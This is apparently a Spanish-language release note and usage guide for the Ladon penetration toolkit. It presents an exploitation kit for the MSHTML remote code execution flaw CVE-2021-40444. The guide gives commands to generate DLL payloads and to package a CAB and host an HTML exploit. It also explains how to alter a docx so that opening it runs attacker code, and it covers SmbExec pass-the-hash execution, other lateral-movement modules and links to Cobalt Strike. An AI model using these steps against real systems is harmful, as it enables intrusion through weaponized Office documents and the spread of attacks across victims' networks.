
Kit de explotación para CVE-2021-40444 ejecución remota de código en MSHTML, que incluye generación de payloads DLL, elaboración de documentos de Office y módulos de movimiento lateral (SmbExec, WmiExec) para pruebas de penetración.
El 8 de septiembre, hora de Beijing, el CERT de NSFOCUS monitoreó un comunicado de seguridad de Microsoft que revelaba la vulnerabilidad de ejecución remota de código en Microsoft MSHTML. Los atacantes pueden crear controles ActiveX maliciosos para ser utilizados por documentos de Microsoft Office que emplean el motor de renderizado del navegador. Al engañar a un usuario para que abra un documento malicioso, se puede ejecutar código arbitrario en el sistema objetivo con los permisos de ese usuario. Microsoft indicó en el comunicado que ya se ha detectado explotación activa de esta vulnerabilidad, por lo que se recomienda a los usuarios afectados tomar medidas de protección.
MSHTML (también conocido como Trident) es el motor del navegador Internet Explorer de Microsoft, y también se utiliza en aplicaciones de Office para renderizar contenido alojado en web en documentos de Word, Excel o PowerPoint. El control ActiveX es un producto de la arquitectura COM de Microsoft, ampliamente utilizado en el conjunto de Office de Windows y en el navegador IE. Aprovechando el control ActiveX se puede interactuar con el componente MSHTML.
Incluye Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022.
Ladon 8.9 2021.9.14 [+] CVE-2021-40444 Vulnerabilidad de ejecución remota de código en Microsoft MSHTML, módulo de explotación para documentos de Office. Versiones afectadas: Incluye Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022. [+] CmdDll cmd a DLL (payload de comando de ejecución DLL para vulnerabilidad 0day en sistema Windows, puede conectar directamente con CobaltStrike mediante PowerShell). Vulnerabilidades de desbordamiento como MS17010, escalada de privilegios local CVE-2021-1675, etc. No desbordamiento como la reciente vulnerabilidad de Office CVE-2021-40444, etc.
Ladon 8.8 2021.9.11 [+] SmbExec NTLM-HASH no interactivo sin salida visible [u] GetInfo Añadida información de máquina virtual Vmware [u] OsScan Añadido reconocimiento de router Vigor Router [u] Añadido reconocimiento de máquinas virtuales Xen\VBOX\Hybrid\Parallels [+] GetInfo Añadido cmdkey, RrpLog, drivers instalados, lista de software, archivos accedidos recientemente, etc. [+] GetInfo Añadido GUID, CPUID, ID de disco, detección de puertas traseras de inicio automático (persistencia DLL, registro, etc.) [+] GetInfo2 Añadida obtención de información de parches WMI [+] Información predeterminada Añadido aviso destacado cuando el espacio libre en disco C es menor a 2 GB.
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Genere el DLL con el comando CMD correspondiente según la necesidad real. El ejemplo muestra la calculadora.
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
Nota: Este módulo requiere usar Ladon40.exe.
Win10 x64 Office 2019
Use cualquier versión de prueba; no es necesario activarla. Si descargó un IMG, cámbielo a ZIP y descomprima para instalar.
Como el objetivo es un sistema Win10 X64, usamos el DLL de 64 bits. Comando: Ladon CVE-2021-40444 MakeCab sc64.dll
Al generar el HTML, la URL debe apuntar a la dirección donde Ladon escucha.
La muestra fue publicada en el círculo pequeño el 10 de septiembre. Cambie la extensión docx a cab o zip, luego edite el archivo rels para que apunte a la URL donde Ladon escucha (poc.html), guarde y renombre de nuevo a .docx.
Al ejecutar el archivo DOC en Win10, se puede ver todo el proceso de solicitud a través del listener de Ladon: docx primero accede al HTML, luego la vulnerabilidad desencadena la carga de nuestro archivo CAB empaquetado, ejecuta la instalación INF mediante CPL y carga nuestro DLL. La funcionalidad del DLL demostrada es la calculadora.
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA
Al ejecutar SmbExec bajo el shell de Cobalt Strike, si se necesitan parámetros con espacios y comillas, la transliteración de CS puede tener problemas; usar comandos CMD normales resulta problemático. Por eso añadí el parámetro b64cmd para facilitar su uso en CS (este método ya se usó en BypassUac hace meses; muchos se preguntan por qué complicarlo, pero cuando el comando CMD contiene muchas secuencias de escape, se vuelve muy complejo traducir de CS a CMD y luego al CMD real). El comando b64cmd se puede generar con LadonGUI 8.2 o posterior usando codificación Base64Unicode.
| ID | Nombre del módulo | Descripción | Uso |
|---|---|---|---|
| 1 | WmiExec | Ejecutar comandos por puerto 135 | http://k8gege.org/Ladon/WinShell.html |
| 2 | PsExec | Ejecutar comandos por puerto 445 | http://k8gege.org/Ladon/WinShell.html |
| 3 | AtExec | Ejecutar comandos por puerto 445 | http://k8gege.org/Ladon/WinShell.html |
| 4 | SshExec | Ejecutar comandos por puerto 22 | http://k8gege.org/Ladon/WinShell.html |
| 5 | JspShell | Ejecutar comandos con una línea JSP | http://k8gege.org/p/ladon_cs_shell.html |
| 6 | WebShell | Ejecutar comandos con WebShell | http://k8gege.org/Ladon/webshell.html |
| 7 | WinrmExec | Ejecutar comandos por puerto 5895 | http://k8gege.org/Ladon/WinrmExec.html |
| 8 | SmbExec | Ejecutar comandos con HASH por puerto 445 | http://k8gege.org/Ladon/SmbExec.html |
PowerLadon: https://github.com/k8gege/PowerLadon Versiones anteriores: http://github.com/k8gege/Ladon/releases Versión 7.0: http://k8gege.org/Download Versión 8.9: Círculo pequeño K8